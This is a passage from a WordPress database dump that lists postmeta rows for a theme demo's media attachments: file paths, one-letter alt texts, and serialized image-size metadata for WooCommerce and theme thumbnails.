''),(443,1434,'_wp_attachment_image_alt','q'),(444,1435,'_wp_attachment_image_alt','q'),(445,1445,'_wp_attachment_image_alt','a'),(446,1456,'_wp_attachment_image_alt','a'),(447,1457,'_wp_attachment_image_alt','a'),(448,1458,'_wp_attachment_image_alt','a'),(449,1468,'_wp_attachment_image_alt','a'),(450,1471,'_wp_attachment_image_alt','o'),(451,1472,'_wp_attachment_image_alt','o'),(452,3399,'_wp_attachment_image_alt','o'),(453,3400,'_wp_attachment_image_alt','o'),(454,3401,'_wp_attachment_image_alt','o'),(455,3402,'_wp_attachment_image_alt','o'),(456,3403,'_wp_attachment_image_alt','o'),(457,3405,'_wp_attachment_image_alt',''),(458,3406,'_wp_attachment_image_alt','h'),(459,3412,'_wp_attachment_image_alt','a'),(460,3414,'_wp_attachment_image_alt','a'),(461,3415,'_wp_attachment_image_alt','a'),(462,3446,'_wp_attachment_image_alt','o'),(463,3447,'_wp_attachment_image_alt','o'),(464,3448,'_wp_attachment_image_alt','o'),(465,3449,'_wp_attachment_image_alt','o'),(466,3451,'_wp_attachment_image_alt','o'),(467,3452,'_wp_attachment_image_alt','o'),(468,3453,'_wp_attachment_image_alt','o'),(469,3454,'_wp_attachment_image_alt',''),(470,3505,'_wp_attachment_image_alt','o'),(471,4188,'_wp_attached_file','2018/03/landing-pricing-plans-1.jpg'),(472,4188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:530;s:6:\"height\";i:306;s:4:\"file\";s:35:\"2018/03/landing-pricing-plans-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-pricing-plans-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-pricing-plans-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-pricing-plans-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-pricing-plans-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-pricing-plans-1-530x300.jpg\";s:5:\"width\";i:530;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-pricing-plans-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-pricing-plans-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-pricing-plans-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(473,2135,'_wp_attached_file','2018/01/blog-recipe-3.jpg'),(474,2135,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:25:\"2018/01/blog-recipe-3.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"blog-recipe-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"blog-recipe-3-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"blog-recipe-3-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"blog-recipe-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(475,3227,'_wp_attached_file','2018/02/h3-slide1-graphic8.png'),(476,3227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:647;s:6:\"height\";i:653;s:4:\"file\";s:30:\"2018/02/h3-slide1-graphic8.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-600x606.png\";s:5:\"width\";i:600;s:6:\"height\";i:606;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-297x300.png\";s:5:\"width\";i:297;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-647x550.png\";s:5:\"width\";i:647;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-550x653.png\";s:5:\"width\";i:550;s:6:\"height\";i:653;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-600x606.png\";s:5:\"width\";i:600;s:6:\"height\";i:606;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(477,754,'_wp_attached_file','2018/01/blog-img-3.jpg'),(478,754,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:22:\"2018/01/blog-img-3.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"blog-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"blog-img-3-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"blog-img-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"blog-img-3-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"blog-img-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"blog-img-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"blog-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"blog-img-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"blog-img-3-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"blog-img-3-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"blog-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"blog-img-3-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(479,1148,'_wp_attached_file','2018/01/h2-img-1.png'),(480,1148,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:59;s:4:\"file\";s:20:\"2018/01/h2-img-1.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h2-img-1-100x59.png\";s:5:\"width\";i:100;s:6:\"height\";i:59;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h2-img-1-100x59.png\";s:5:\"width\";i:100;s:6:\"height\";i:59;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(481,112,'_wp_attached_file','2018/01/about-us-gallery-img-4.jpg'),(482,112,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:451;s:4:\"file\";s:34:\"2018/01/about-us-gallery-img-4.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-4-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-4-580x300.jpg\";s:5:\"width\";i:580;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-4-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-4-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(483,1473,'_wp_attached_file','2018/01/portfolio-masonry-img-2.jpg'),(484,1473,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:501;s:4:\"file\";s:35:\"2018/01/portfolio-masonry-img-2.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-600x376.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-768x481.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:481;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-550x501.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:501;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-550x501.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:501;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-600x376.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(485,3509,'_wp_attached_file','2018/02/landing-slide4-graphic1.png'),(486,3509,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:593;s:6:\"height\";i:1124;s:4:\"file\";s:35:\"2018/02/landing-slide4-graphic1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide4-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic1-158x300.png\";s:5:\"width\";i:158;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"landing-slide4-graphic1-540x1024.png\";s:5:\"width\";i:540;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic1-593x300.png\";s:5:\"width\";i:593;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic1-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic1-593x550.png\";s:5:\"width\";i:593;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"landing-slide4-graphic1-550x1100.png\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:36:\"landing-slide4-graphic1-593x1100.png\";s:5:\"width\";i:593;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide4-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(487,1148,'_wp_attachment_image_alt','o'),(488,2129,'_wp_attachment_image_alt','a'),(489,2135,'_wp_attachment_image_alt','a'),(490,1151,'_wp_attached_file','2018/01/product1-gallery1.jpg'),(491,1151,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product1-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product1-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product1-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"c